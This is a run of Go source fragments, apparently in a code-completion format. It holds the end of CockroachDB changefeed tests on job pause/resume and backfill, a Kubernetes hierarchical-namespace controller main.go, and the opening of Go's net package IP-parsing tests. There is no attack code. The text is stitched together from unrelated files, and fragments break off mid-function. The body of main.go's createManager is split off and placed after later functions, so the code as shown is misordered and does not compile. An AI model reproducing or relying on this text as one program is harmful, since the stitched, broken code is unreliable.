defer func(i time.Duration) { jobs.DefaultAdoptInterval = i }(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 10 * time.Millisecond
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b'), (4, 'c'), (7, 'd'), (8, 'e')`)
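// Capture a cluster timestamp after the inserts to use as the changefeed
// cursor; combined with initial_scan, the feed scans as of that timestamp.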
var tsStr string
sqlDB.QueryRow(t, `SELECT cluster_logical_timestamp() from foo`).Scan(&tsStr)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo `+
`WITH initial_scan, resolved='10ms', cursor='`+tsStr+`'`).(*cdctest.TableFeed)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}}`,
`foo: [4]->{"after": {"a": 4, "b": "c"}}`,
`foo: [7]->{"after": {"a": 7, "b": "d"}}`,
`foo: [8]->{"after": {"a": 8, "b": "e"}}`,
})
// Wait for the high-water mark on the job to be updated after the initial
// scan, to make sure we don't get the initial scan data again.
expectResolvedTimestamp(t, foo)
expectResolvedTimestamp(t, foo)
sqlDB.Exec(t, `PAUSE JOB $1`, foo.JobID)
// PAUSE JOB only requests the job to be paused. Block until it's paused.
opts := retry.Options{
InitialBackoff: 1 * time.Millisecond,
MaxBackoff: time.Second,
Multiplier: 2,
}
ctx := context.Background()
if err := retry.WithMaxAttempts(ctx, opts, 10, func() error {
var status string
sqlDB.QueryRow(t, `SELECT status FROM system.jobs WHERE id = $1`, foo.JobID).Scan(&status)
if jobs.Status(status) != jobs.StatusPaused {
return errors.New("could not pause job")
}
return nil
}); err != nil {
t.Fatal(err)
}
foo.ResetSeen()
sqlDB.Exec(t, `INSERT INTO foo VALUES (16, 'f')`)
sqlDB.Exec(t, `RESUME JOB $1`, foo.JobID)
assertPayloads(t, foo, []string{
`foo: [16]->{"after": {"a": 16, "b": "f"}}`,
})
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestManyChangefeedsOneTable(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'init')`)
foo1 := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`)
defer closeFeed(t, foo1)
foo2 := feed(t, f, `CREATE CHANGEFEED FOR foo`) // without diff
defer closeFeed(t, foo2)
foo3 := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`)
defer closeFeed(t, foo3)
// Make sure all the changefeeds are going.
assertPayloads(t, foo1, []string{`foo: [0]->{"after": {"a": 0, "b": "init"}, "before": null}`})
assertPayloads(t, foo2, []string{`foo: [0]->{"after": {"a": 0, "b": "init"}}`})
assertPayloads(t, foo3, []string{`foo: [0]->{"after": {"a": 0, "b": "init"}, "before": null}`})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'v0')`)
assertPayloads(t, foo1, []string{
`foo: [0]->{"after": {"a": 0, "b": "v0"}, "before": {"a": 0, "b": "init"}}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'v1')`)
assertPayloads(t, foo1, []string{
`foo: [1]->{"after": {"a": 1, "b": "v1"}, "before": null}`,
})
assertPayloads(t, foo2, []string{
`foo: [0]->{"after": {"a": 0, "b": "v0"}}`,
`foo: [1]->{"after": {"a": 1, "b": "v1"}}`,
})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'v2')`)
assertPayloads(t, foo1, []string{
`foo: [0]->{"after": {"a": 0, "b": "v2"}, "before": {"a": 0, "b": "v0"}}`,
})
assertPayloads(t, foo2, []string{
`foo: [0]->{"after": {"a": 0, "b": "v2"}}`,
})
assertPayloads(t, foo3, []string{
`foo: [0]->{"after": {"a": 0, "b": "v0"}, "before": {"a": 0, "b": "init"}}`,
`foo: [0]->{"after": {"a": 0, "b": "v2"}, "before": {"a": 0, "b": "v0"}}`,
`foo: [1]->{"after": {"a": 1, "b": "v1"}, "before": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestUnspecifiedPrimaryKey(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT)`)
var id0 int
sqlDB.QueryRow(t, `INSERT INTO foo VALUES (0) RETURNING rowid`).Scan(&id0)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
var id1 int
sqlDB.QueryRow(t, `INSERT INTO foo VALUES (1) RETURNING rowid`).Scan(&id1)
assertPayloads(t, foo, []string{
fmt.Sprintf(`foo: [%d]->{"after": {"a": 0, "rowid": %d}}`, id0, id0),
fmt.Sprintf(`foo: [%d]->{"after": {"a": 1, "rowid": %d}}`, id1, id1),
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// TestChangefeedNodeShutdown ensures that an enterprise changefeed continues
// running after the original job-coordinator node is shut down.
func TestChangefeedNodeShutdown(t *testing.T) {
defer leaktest.AfterTest(t)()
t.Skip("#32232")
defer func(oldInterval time.Duration) {
jobs.DefaultAdoptInterval = oldInterval
}(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 100 * time.Millisecond
flushCh := make(chan struct{}, 1)
defer close(flushCh)
knobs := base.TestingKnobs{DistSQL: &execinfra.TestingKnobs{Changefeed: &TestingKnobs{
AfterSinkFlush: func() error {
select {
case flushCh <- struct{}{}:
default:
}
return nil
},
}}}
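// The AfterSinkFlush knob signals (without blocking) each time the sink
// flushes, so the table feed can wait for the changefeed to make progress.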
tc := serverutils.StartTestCluster(t, 3, base.TestClusterArgs{
ServerArgs: base.TestServerArgs{
UseDatabase: "d",
Knobs: knobs,
},
})
defer tc.Stopper().Stop(context.Background())
db := tc.ServerConn(1)
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `SET CLUSTER SETTING changefeed.experimental_poll_interval = '0ns'`)
sqlDB.Exec(t, `CREATE DATABASE d`)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'initial')`)
// Create a factory which uses server 1 as the output of the Sink, but
// executes the CREATE CHANGEFEED statement on server 0.
sink, cleanup := sqlutils.PGUrl(
t, tc.Server(0).ServingSQLAddr(), t.Name(), url.User(security.RootUser))
defer cleanup()
f := cdctest.MakeTableFeedFactory(tc.Server(1), tc.ServerConn(0), flushCh, sink)
foo := feed(t, f, "CREATE CHANGEFEED FOR foo")
defer closeFeed(t, foo)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'second')`)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "initial"}}`,
`foo: [1]->{"after": {"a": 1, "b": "second"}}`,
})
// TODO(mrtracy): At this point we need to wait for a resolved timestamp,
// in order to ensure that there isn't a repeat when the job is picked up
// again. As an alternative, we could use a verifier instead of assertPayloads.
// Wait for the high-water mark on the job to be updated after the initial
// scan, to make sure we don't get the initial scan data again.
// Stop server 0, which is where the table feed connects.
tc.StopServer(0)
sqlDB.Exec(t, `UPSERT INTO foo VALUES(0, 'updated')`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (3, 'third')`)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "updated"}}`,
`foo: [3]->{"after": {"a": 3, "b": "third"}}`,
})
}
func TestChangefeedTelemetry(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
sqlDB.Exec(t, `CREATE TABLE bar (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (1)`)
// Reset the counts.
_ = telemetry.GetFeatureCounts(telemetry.Raw, telemetry.ResetCounts)
// Start some feeds (and read from them to make sure they've started).
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
fooBar := feed(t, f, `CREATE CHANGEFEED FOR foo, bar WITH format=json`)
defer closeFeed(t, fooBar)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1}}`,
})
assertPayloads(t, fooBar, []string{
`bar: [1]->{"after": {"a": 1}}`,
`foo: [1]->{"after": {"a": 1}}`,
})
var expectedSink string
if strings.Contains(t.Name(), `sinkless`) || strings.Contains(t.Name(), `poller`) {
expectedSink = `sinkless`
} else {
expectedSink = `experimental-sql`
}
counts := telemetry.GetFeatureCounts(telemetry.Raw, telemetry.ResetCounts)
require.Equal(t, int32(2), counts[`changefeed.create.sink.`+expectedSink])
require.Equal(t, int32(2), counts[`changefeed.create.format.json`])
require.Equal(t, int32(1), counts[`changefeed.create.num_tables.1`])
require.Equal(t, int32(1), counts[`changefeed.create.num_tables.2`])
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedMemBufferCapacity(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
// The RowContainer used internally by the memBuffer seems to request from
// the budget in 10240-byte chunks. Set this capacity high enough for one
// chunk but not for a second. I'd love to be able to derive this from
// constants, but I don't see how to do that without a refactor.
knobs.MemBufferCapacity = 20000
beforeEmitRowCh := make(chan struct{}, 1)
knobs.BeforeEmitRow = func(ctx context.Context) error {
select {
case <-ctx.Done():
return ctx.Err()
case <-beforeEmitRowCh:
}
return nil
}
defer close(beforeEmitRowCh)
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'small')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
// Small amounts of data fit in the buffer.
beforeEmitRowCh <- struct{}{}
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "small"}}`,
})
// Put enough data in to overflow the buffer and verify that at some point
// we get the "memory budget exceeded" error.
sqlDB.Exec(t, `INSERT INTO foo SELECT i, 'foofoofoo' FROM generate_series(1, $1) AS g(i)`, 1000)
if _, err := foo.Next(); !testutils.IsError(err, `memory budget exceeded`) {
t.Fatalf(`expected "memory budget exceeded" error got: %v`, err)
}
}
// The mem buffer is only used with RangeFeed.
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// Regression test for #41694.
func TestChangefeedRestartDuringBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
defer func(i time.Duration) { jobs.DefaultAdoptInterval = i }(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 10 * time.Millisecond
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
beforeEmitRowCh := make(chan error, 20)
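// Each emitted row consumes one value from this channel, so the test can
// meter exactly how many rows the changefeed may emit and inject errors at
// a chosen point.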
knobs.BeforeEmitRow = func(ctx context.Context) error {
select {
case <-ctx.Done():
return ctx.Err()
case err := <-beforeEmitRowCh:
return err
}
}
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0), (1), (2), (3)`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`).(*cdctest.TableFeed)
defer closeFeed(t, foo)
// TODO(dan): At a high level, all we're doing is trying to restart a
// changefeed in the middle of changefeed backfill after a schema change
// finishes. It turns out this is pretty hard to do with our current testing
// knobs and this test ends up being pretty brittle. I'd love it if anyone
// thought of a better way to do this.
// Read the initial data in the rows.
for i := 0; i < 4; i++ {
beforeEmitRowCh <- nil
}
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0}, "before": null}`,
`foo: [1]->{"after": {"a": 1}, "before": null}`,
`foo: [2]->{"after": {"a": 2}, "before": null}`,
`foo: [3]->{"after": {"a": 3}, "before": null}`,
})
// Run a schema change that backfills kvs.
sqlDB.Exec(t, `ALTER TABLE foo ADD COLUMN b STRING DEFAULT 'backfill'`)
// Unblock emit for each kv written by the schema change's backfill. The
// changefeed actually emits these, but we lose them to overaggressive
// duplicate detection in tableFeed.
// TODO(dan): Track duplicates more precisely in tableFeed.
for i := 0; i < 4; i++ {
beforeEmitRowCh <- nil
}
// Unblock the emit for *all but one* of the rows emitted by the changefeed
// backfill (run after the schema change completes and the final table
// descriptor is written). This test has 4 rows because the `sqlSink` that
// powers `tableFeed` only flushes once it has 3 rows, so we need 1 more
// than that to guarantee that this first one gets flushed.
for i := 0; i < 3; i++ {
beforeEmitRowCh <- nil
}
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0}, "before": {"a": 0}}`,
`foo: [1]->{"after": {"a": 1}, "before": {"a": 1}}`,
`foo: [2]->{"after": {"a": 2}, "before": {"a": 2}}`,
`foo: [3]->{"after": {"a": 3}, "before": {"a": 3}}`,
`foo: [0]->{"after": {"a": 0, "b": "backfill"}, "before": {"a": 0}}`,
})
// Restart the changefeed without allowing the second row to be backfilled.
sqlDB.Exec(t, `PAUSE JOB $1`, foo.JobID)
// PAUSE JOB only requests the job to be paused. Block until it's paused.
opts := retry.Options{
InitialBackoff: 1 * time.Millisecond,
MaxBackoff: time.Second,
Multiplier: 2,
}
ctx := context.Background()
if err := retry.WithMaxAttempts(ctx, opts, 10, func() error {
var status string
sqlDB.QueryRow(t, `SELECT status FROM system.jobs WHERE id = $1`, foo.JobID).Scan(&status)
if jobs.Status(status) != jobs.StatusPaused {
return errors.New("could not pause job")
}
return nil
}); err != nil {
t.Fatal(err)
}
// Make extra sure that the zombie changefeed can't write any more data.
beforeEmitRowCh <- MarkRetryableError(errors.New(`nope don't write it`))
// Insert some data that we should only see out of the changefeed after it
// re-runs the backfill.
sqlDB.Exec(t, `INSERT INTO foo VALUES (6, 'bar')`)
// Unblock all later emits, we don't need this control anymore.
close(beforeEmitRowCh)
// Resume the changefeed and the backfill should start up again. Currently
// this does the entire backfill again, you could imagine in the future that
// we do some sort of backfill checkpointing and start the backfill up from
// the last checkpoint.
sqlDB.Exec(t, `RESUME JOB $1`, foo.JobID)
assertPayloads(t, foo, []string{
// The changefeed actually emits this row, but we lose it to
// overaggressive duplicate detection in tableFeed.
// TODO(dan): Track duplicates more precisely in sinklessFeed/tableFeed.
// `foo: [0]->{"after": {"a": 0, "b": "backfill"}}`,
`foo: [1]->{"after": {"a": 1, "b": "backfill"}, "before": {"a": 1}}`,
`foo: [2]->{"after": {"a": 2, "b": "backfill"}, "before": {"a": 2}}`,
`foo: [3]->{"after": {"a": 3, "b": "backfill"}, "before": {"a": 3}}`,
})
assertPayloads(t, foo, []string{
`foo: [6]->{"after": {"a": 6, "b": "bar"}, "before": null}`,
})
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
| TestChangefeedResolvedFrequency |
main.go | /*
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"errors"
"flag"
"net/http"
"os"
"strings"
"contrib.go.opencensus.io/exporter/prometheus"
"contrib.go.opencensus.io/exporter/stackdriver"
"github.com/go-logr/zapr"
corev1 "k8s.io/api/core/v1"
// Change to use v1 when we only need to support 1.17 and higher kubernetes versions.
stdzap "go.uber.org/zap"
"go.uber.org/zap/zapcore"
apiextensions "k8s.io/apiextensions-apiserver/pkg/apis/apiextensions/v1"
"k8s.io/apimachinery/pkg/runtime"
clientgoscheme "k8s.io/client-go/kubernetes/scheme"
_ "k8s.io/client-go/plugin/pkg/client/auth/gcp"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/healthz"
"sigs.k8s.io/controller-runtime/pkg/log/zap"
"sigs.k8s.io/controller-runtime/pkg/metrics"
// +kubebuilder:scaffold:imports
v1a2 "sigs.k8s.io/hierarchical-namespaces/api/v1alpha2"
"sigs.k8s.io/hierarchical-namespaces/internal/config"
"sigs.k8s.io/hierarchical-namespaces/internal/forest"
"sigs.k8s.io/hierarchical-namespaces/internal/setup"
"sigs.k8s.io/hierarchical-namespaces/internal/stats"
)
var (
scheme = runtime.NewScheme()
setupLog = zap.New().WithName("setup")
)
var (
probeAddr string
metricsAddr string
enableStackdriver bool
maxReconciles int
enableLeaderElection bool
leaderElectionId string
noWebhooks bool
debugLogs bool
testLog bool
internalCert bool
qps int
webhookServerPort int
restartOnSecretRefresh bool
unpropagatedAnnotations arrayArg
excludedNamespaces arrayArg
managedNamespaceLabels arrayArg
managedNamespaceAnnots arrayArg
includedNamespacesRegex string
webhooksOnly bool
)
// init preloads some global vars before main() starts. Since this is the top-level module, I'm not
// sure what happens _between_ init() and main() but this is the way kubebuilder left things so I'm
// going to leave it alone.
func init() {
setupLog.Info("Starting main.go:init()")
defer setupLog.Info("Finished main.go:init()")
_ = clientgoscheme.AddToScheme(scheme)
_ = v1a2.AddToScheme(scheme)
_ = corev1.AddToScheme(scheme)
_ = apiextensions.AddToScheme(scheme)
// +kubebuilder:scaffold:scheme
}
func main() {
parseFlags()
metricsCleanupFn := enableMetrics()
defer metricsCleanupFn()
mgr := createManager()
// Make sure certs are managed if requested. In webhooks-only mode, we don't run the manager, and
// rely on either a controller running in a different HNC deployment, or an external tool such as
// cert-manager.
certsReady := make(chan struct{})
if internalCert && !webhooksOnly {
setupLog.Info("Starting certificate generation")
err := setup.ManageCerts(mgr, certsReady, restartOnSecretRefresh)
if err != nil {
setupLog.Error(err, "unable to set up cert rotation")
os.Exit(1)
}
} else {
close(certsReady)
}
setupProbeEndpoints(mgr, certsReady)
// The call to mgr.Start will never return, but the certs won't be ready until the manager starts
// and we can't set up the webhooks without them (the webhook server runnable will try to read the
// certs, and if those certs don't exist, the entire process will exit). So start a goroutine
// which will wait until the certs are ready, and then create the rest of the HNC controllers.
go startControllers(mgr, certsReady)
setupLog.Info("Starting manager")
if err := mgr.Start(ctrl.SetupSignalHandler()); err != nil {
setupLog.Error(err, "problem running manager")
os.Exit(1)
}
}
func parseFlags() {
setupLog.Info("Parsing flags")
flag.StringVar(&probeAddr, "health-probe-bind-address", ":8081", "The address the probe endpoint binds to.")
flag.StringVar(&metricsAddr, "metrics-addr", ":8080", "The address the metric endpoint binds to.")
flag.BoolVar(&enableStackdriver, "enable-stackdriver", true, "If true, export metrics to stackdriver")
flag.BoolVar(&enableLeaderElection, "enable-leader-election", false,
"Enable leader election for controller manager. Enabling this will ensure there is only one active controller manager.")
flag.StringVar(&leaderElectionId, "leader-election-id", "controller-leader-election-helper",
"Leader election id determines the name of the configmap that leader election will use for holding the leader lock.")
flag.BoolVar(&noWebhooks, "no-webhooks", false, "Disables webhooks")
flag.BoolVar(&debugLogs, "debug-logs", false, "Shows verbose logs.")
flag.BoolVar(&testLog, "enable-test-log", false, "Enables test log.")
flag.BoolVar(&internalCert, "enable-internal-cert-management", false, "Enables internal cert management. See the user guide for more information.")
flag.IntVar(&maxReconciles, "max-reconciles", 1, "Number of concurrent reconciles to perform.")
flag.IntVar(&qps, "apiserver-qps-throttle", 50, "The maximum QPS to the API server. See the user guide for more information.")
flag.BoolVar(&stats.SuppressObjectTags, "suppress-object-tags", true, "If true, suppresses the kinds of object metrics to reduce metric cardinality. See the user guide for more information.")
flag.IntVar(&webhookServerPort, "webhook-server-port", 443, "The port that the webhook server serves at.")
flag.Var(&unpropagatedAnnotations, "unpropagated-annotation", "An annotation that, if present, will be stripped out of any propagated copies of an object. May be specified multiple times, with each instance specifying one annotation. See the user guide for more information.")
flag.Var(&excludedNamespaces, "excluded-namespace", "A namespace that, if present, will be excluded from HNC management. May be specified multiple times, with each instance specifying one namespace. See the user guide for more information.")
flag.StringVar(&includedNamespacesRegex, "included-namespace-regex", ".*", "Namespace regular expression. Namespaces that match this regexp will be included and handled by HNC. The regex is implicitly wrapped by \"^...$\" and may only be specified once.")
flag.BoolVar(&restartOnSecretRefresh, "cert-restart-on-secret-refresh", false, "Kills the process when secrets are refreshed so that the pod can be restarted (secrets take up to 60s to be updated by running pods)")
flag.Var(&managedNamespaceLabels, "managed-namespace-label", "A regex indicating the labels on namespaces that are managed by HNC. These labels may only be set via the HierarchyConfiguration object. All regexes are implicitly wrapped by \"^...$\". This argument can be specified multiple times. See the user guide for more information.")
flag.Var(&managedNamespaceAnnots, "managed-namespace-annotation", "A regex indicating the annotations on namespaces that are managed by HNC. These annotations may only be set via the HierarchyConfiguration object. All regexes are implicitly wrapped by \"^...$\". This argument can be specified multiple times. See the user guide for more information.")
flag.BoolVar(&webhooksOnly, "webhooks-only", false, "Disables the controllers so HNC can be run in HA webhook mode")
flag.Parse()
// Assign the array args to the configuration variables after the args are parsed.
config.UnpropagatedAnnotations = unpropagatedAnnotations
config.SetNamespaces(includedNamespacesRegex, excludedNamespaces...)
if err := config.SetManagedMeta(managedNamespaceLabels, managedNamespaceAnnots); err != nil {
setupLog.Error(err, "Illegal flag values")
os.Exit(1)
}
// Basic legality checks
if webhooksOnly && noWebhooks {
setupLog.Info("Cannot set both --webhooks-only and --no-webhooks")
os.Exit(1)
}
}
// enableMetrics returns a function to call from main() to export any remaining metrics when main()
// is exiting.
func enableMetrics() func() {
var cleanupFn func()
// Enable OpenCensus exporters to export metrics
// to Stackdriver Monitoring.
// Exporters use Application Default Credentials to authenticate.
// See https://developers.google.com/identity/protocols/application-default-credentials
// for more details.
if enableStackdriver {
setupLog.Info("Creating OpenCensus->Stackdriver exporter")
sd, err := stackdriver.NewExporter(stackdriver.Options{
// Stackdriver’s minimum stats reporting period must be >= 60 seconds.
// https://opencensus.io/exporters/supported-exporters/go/stackdriver/
ReportingInterval: stats.ReportingInterval,
})
if err == nil {
err = sd.StartMetricsExporter()
if err == nil {
cleanupFn = func() {
// Flush must be called before main() exits to ensure metrics are recorded.
sd.Flush()
sd.StopMetricsExporter()
}
}
}
if err != nil {
setupLog.Error(err, "Could not create Stackdriver exporter")
}
}
// Hook up OpenCensus to Prometheus.
//
// Creating a prom/oc exporter automatically registers the exporter with Prometheus; we can ignore
// the returned value since it doesn't do anything anyway. See:
// (https://github.com/census-ecosystem/opencensus-go-exporter-prometheus/blob/2b9ada237b532c09fcb0a1242469827bdb89df41/prometheus.go#L103)
setupLog.Info("Creating Prometheus exporter")
_, err := prometheus.NewExporter(prometheus.Options{
Registerer: metrics.Registry, // use the controller-runtime registry to merge with all other metrics
})
if err != nil {
setupLog.Error(err, "Could not create Prometheus exporter")
}
return cleanupFn
}
func createManager() ctrl.Manager {
| // setupProbeEndpoints registers the health endpoints
func setupProbeEndpoints(mgr ctrl.Manager, certsReady chan struct{}) {
// We can't use the default checker directly, since the checker assumes that the webhook server
// has been started, and it will error out (and crash HNC) if the certs don't exist yet.
// Therefore, this thin wrapper checks whether the certs are ready, and if so, bypasses the
// controller-manager checker.
checker := func(req *http.Request) error {
select {
case <-certsReady:
return mgr.GetWebhookServer().StartedChecker()(req)
default:
return errors.New("HNC internal certs are not yet ready")
}
}
// If we're not running the webhooks, no point checking to see if they're up.
if noWebhooks {
checker = healthz.Ping
}
if err := mgr.AddHealthzCheck("healthz", checker); err != nil {
setupLog.Error(err, "unable to set up health check")
os.Exit(1)
}
if err := mgr.AddReadyzCheck("readyz", checker); err != nil {
setupLog.Error(err, "unable to set up ready check")
os.Exit(1)
}
setupLog.Info("Probe endpoints are configured on healthz and readyz")
}
func startControllers(mgr ctrl.Manager, certsReady chan struct{}) {
// The controllers won't work until the webhooks are operating, and those won't work until the
// certs are all in place.
setupLog.Info("Waiting for certificate generation to complete")
<-certsReady
setupLog.Info("Certs ready")
if testLog {
stats.StartLoggingActivity()
}
// Create the central in-memory data structure for HNC, since it needs to be shared among all
// other components.
f := forest.NewForest()
opts := setup.Options{
NoWebhooks: noWebhooks,
MaxReconciles: maxReconciles,
ReadOnly: webhooksOnly,
}
setup.Create(setupLog, mgr, f, opts)
setupLog.Info("All controllers started; setup complete")
}
// arrayArg is an arg that can be specified multiple times. It implements
// https://golang.org/pkg/flag/#Value and is based on
// https://stackoverflow.com/questions/28322997/how-to-get-a-list-of-values-into-a-flag-in-golang.
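// For example, passing --excluded-namespace=foo --excluded-namespace=bar
// yields the value ["foo", "bar"].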
type arrayArg []string
func (a arrayArg) String() string {
return strings.Join(a, ", ")
}
func (a *arrayArg) Set(val string) error {
*a = append(*a, val)
return nil
}
| setupLog.Info("Configuring controller-manager")
logLevel := zapcore.InfoLevel
if debugLogs {
logLevel = zapcore.DebugLevel
}
// Create a raw (upstream) zap logger that we can pass to both
// the zap stdlib log redirect and logr.Logger shim we use for controller-runtime.
// Stdlib is redirected at ErrorLevel since it should only log
// if it can't return an error, like in http.Server before a handler is invoked,
// and we expect other libraries to do the same.
rawlog := zap.NewRaw(zap.Level(logLevel), zap.StacktraceLevel(zapcore.PanicLevel))
stdzap.RedirectStdLogAt(rawlog, zapcore.ErrorLevel)
log := zapr.NewLogger(rawlog)
ctrl.SetLogger(log)
cfg := ctrl.GetConfigOrDie()
cfg.QPS = float32(qps)
// By default, Burst is about 2x QPS, but since HNC's "bursts" can last for ~minutes
// we need to raise the QPS param to be much higher than we ordinarily would. As a
// result, doubling this higher threshold is probably much too high, so lower it to a more
// reasonable number.
//
// TODO: Better understand the behaviour of Burst, and consider making it equal to QPS if
// it turns out to be harmful.
cfg.Burst = int(cfg.QPS * 1.5)
mgr, err := ctrl.NewManager(cfg, ctrl.Options{
NewClient: config.NewCachingClient,
Scheme: scheme,
MetricsBindAddress: metricsAddr,
HealthProbeBindAddress: probeAddr,
LeaderElection: enableLeaderElection,
LeaderElectionID: leaderElectionId,
Port: webhookServerPort,
})
if err != nil {
setupLog.Error(err, "unable to create manager")
os.Exit(1)
}
return mgr
}
|
ip_test.go | // Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package net
import (
"bytes"
"math/rand"
"reflect"
"runtime"
"testing"
)
var parseIPTests = []struct {
in string
out IP
}{
{"127.0.1.2", IPv4(127, 0, 1, 2)},
{"127.0.0.1", IPv4(127, 0, 0, 1)},
{"127.001.002.003", IPv4(127, 1, 2, 3)},
{"::ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"::ffff:127.001.002.003", IPv4(127, 1, 2, 3)},
{"::ffff:7f01:0203", IPv4(127, 1, 2, 3)},
{"0:0:0:0:0000:ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"0:0:0:0:000000:ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"0:0:0:0::ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"2001:4860:0:2001::68", IP{0x20, 0x01, 0x48, 0x60, 0, 0, 0x20, 0x01, 0, 0, 0, 0, 0, 0, 0x00, 0x68}},
{"2001:4860:0000:2001:0000:0000:0000:0068", IP{0x20, 0x01, 0x48, 0x60, 0, 0, 0x20, 0x01, 0, 0, 0, 0, 0, 0, 0x00, 0x68}},
{"-0.0.0.0", nil},
{"0.-1.0.0", nil},
{"0.0.-2.0", nil},
{"0.0.0.-3", nil},
{"127.0.0.256", nil},
{"abc", nil},
{"123:", nil},
{"fe80::1%lo0", nil},
{"fe80::1%911", nil},
{"", nil},
{"a1:a2:a3:a4::b1:b2:b3:b4", nil}, // Issue 6628
}
func TestParseIP(t *testing.T) {
for _, tt := range parseIPTests {
if out := ParseIP(tt.in); !reflect.DeepEqual(out, tt.out) {
t.Errorf("ParseIP(%q) = %v, want %v", tt.in, out, tt.out)
}
if tt.in == "" {
// Tested in TestMarshalEmptyIP below.
continue
}
var out IP
if err := out.UnmarshalText([]byte(tt.in)); !reflect.DeepEqual(out, tt.out) || (tt.out == nil) != (err != nil) {
t.Errorf("IP.UnmarshalText(%q) = %v, %v, want %v", tt.in, out, err, tt.out)
}
}
}
func TestLookupWithIP(t *testing.T) {
_, err := LookupIP("")
if err == nil {
t.Errorf(`LookupIP("") succeeded, should fail`)
}
_, err = LookupHost("")
if err == nil {
t.Errorf(`LookupHost("") succeeded, should fail`)
}
// Test that LookupHost and LookupIP, which normally
// expect host names, work with IP addresses.
for _, tt := range parseIPTests {
if tt.out != nil {
addrs, err := LookupHost(tt.in)
if len(addrs) != 1 || addrs[0] != tt.in || err != nil {
t.Errorf("LookupHost(%q) = %v, %v, want %v, nil", tt.in, addrs, err, []string{tt.in})
}
